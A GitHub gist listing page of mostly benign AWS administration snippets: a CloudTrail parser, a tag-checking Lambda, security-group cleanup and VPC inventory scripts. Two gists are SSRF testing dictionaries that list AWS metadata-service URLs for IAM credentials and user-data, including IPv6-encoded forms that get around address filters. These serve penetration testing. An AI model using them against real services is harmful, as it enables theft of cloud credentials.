
@acumenix
acumenix / cloud_metadata.txt
Created February 5, 2019 21:45 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
acumenix / riaudit.rb
Created August 9, 2019 04:56 — forked from cognusion/riaudit.rb
Simple script to audit AWS EC2 Reserved Instances vs Instances running.
#!/usr/bin/env ruby
# Audits your reserved instances vs your running instances, and reports back.
# If you want to run this from an AWS instance, its IAM Role must be granted at least the following:
#
# {
#   "Statement": [
#     {
#       "Action": [
#         "ec2:DescribeInstances",
acumenix / cloudTrailEventNames.list
Created August 23, 2019 06:25 — forked from pkazi/cloudTrailEventNames.list
List of values for parameter EventName in AWS Cloudtrail events
AbortDocumentVersionUpload
AbortEnvironmentUpdate
AbortMultipartUpload
AbortVaultLock
AcceptAccountMapping
AcceptCertificateTransfer
AcceptDelegate
AcceptDirectConnectGatewayAssociationProposal
AcceptFxPaymentCurrencyTermsAndConditions
AcceptHandshake
acumenix / README.md
Created August 23, 2019 06:25 — forked from magnetikonline/README.md
Python AWS CloudTrail parser class.

Python AWS CloudTrail parser

A Python parser class for CloudTrail event archives, previously dumped to an S3 bucket. Class provides an iterator which will:

  • Scan a given directory for archive files matching the required pattern.
  • Decompress each archive in memory.
  • Parse JSON payload and return each event in turn.

The parser is contained in cloudtrailparser.py; timezone.py provides a minimal concrete datetime.tzinfo implementation for the UTC timezone.

Example

acumenix / ec2TagCheck.py
Created August 23, 2019 06:26 — forked from kangks/ec2TagCheck.py
Lambda function triggered by CloudTrail events to check for required tags, notifying the owner through SES if the tags are not found
import boto3
required_keys = [ "key01", "key02", "key03", "key04" ]
ses_source = '[email protected]'
ses_destination = ['[email protected]']
def lambda_handler(event, context):
    if 'detail' in event and 'instance-id' in event['detail']:
        ec2_instance_id = event['detail']['instance-id']
acumenix / index.js
Created August 23, 2019 06:27 — forked from adamgoucher/index.js
An AWS Lambda function which monitors CloudTrail logs created in the us-east-1 region for CreateHostedZone events and makes the corresponding private zone if they were public. The problem is that this can have a lag of up to 15 minutes.
var aws = require('aws-sdk');
var zlib = require('zlib');
var async = require('async');
var EVENT_SOURCE_TO_TRACK = /route53.amazonaws.com/;
var EVENT_NAME_TO_TRACK = /CreateHostedZone/;
var s3 = new aws.S3();
var route53 = new aws.Route53();
acumenix / cloud_metadata.txt
Created September 13, 2019 05:22 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
acumenix / security-group-cleanup.py
Created October 8, 2019 20:45 — forked from TomRyan-321/security-group-cleanup.py
Security Group Cleanup using boto3 with RDS check fixed
#!/usr/bin/env python
import boto3
import argparse
def lookup_by_id(sgid):
    sg = ec2.get_all_security_groups(group_ids=sgid)
    return sg[0].name
acumenix / security-group-cleanup.py
Created October 8, 2019 20:46 — forked from snixon/security-group-cleanup.py
Fancy Security Group Cleanup
#!/usr/bin/env python
import os
import boto3
import argparse
import json
# `pip install -U PTable` will get you the right fork of PrettyTable
from prettytable import PrettyTable
from botocore.exceptions import ClientError
acumenix / inventory_vpcs.py
Created October 9, 2019 05:52 — forked from jezhumble/inventory_vpcs.py
List EC2, RDS and ElastiCache instances, grouped by VPC
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse, sys, boto3
from colorama import Fore, Style
def count(my_list, my_key):
    if my_key not in my_list:
        return '0'
    else: